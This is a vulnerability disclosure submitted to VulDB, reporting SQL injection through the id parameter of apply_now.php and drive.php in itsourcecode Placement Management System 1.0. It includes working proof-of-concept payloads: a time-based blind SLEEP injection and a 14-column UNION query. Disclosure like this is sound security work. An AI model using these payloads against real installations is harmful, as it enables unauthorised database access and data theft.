Submit #383864: itsourcecode Placement Management System 1.0 SQLiinfo

Title	itsourcecode Placement Management System 1.0 SQLi
Description	In the apply_now.php page, the id parameter is not strictly filtered, allowing attackers to construct malicious payloads for SQL injection attacks.The same issue also exists on the drive.php page. ——————POC—————— Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 1150 FROM (SELECT(SLEEP(5)))cjwo) AND 'BTUh'='BTUh Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: id=1' UNION ALL SELECT CONCAT(0x716a7a7171,0x7473767843427a464d48514b6e4b464a5365624d71574d7944575573446d62614950505a487a437a,0x7162626b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
Source	⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE11-3.md
User	Dee.Mirage (UID 71702)
Submission	07/31/2024 16:20 (2 years ago)
Moderation	08/03/2024 08:49 (3 days later)
Status	Accepted
VulDB entry	273542 [itsourcecode Placement Management System 1.0 apply_now.php ID sql injection]
Points	20

Might our Artificial Intelligence support you?

Check our Alexa App!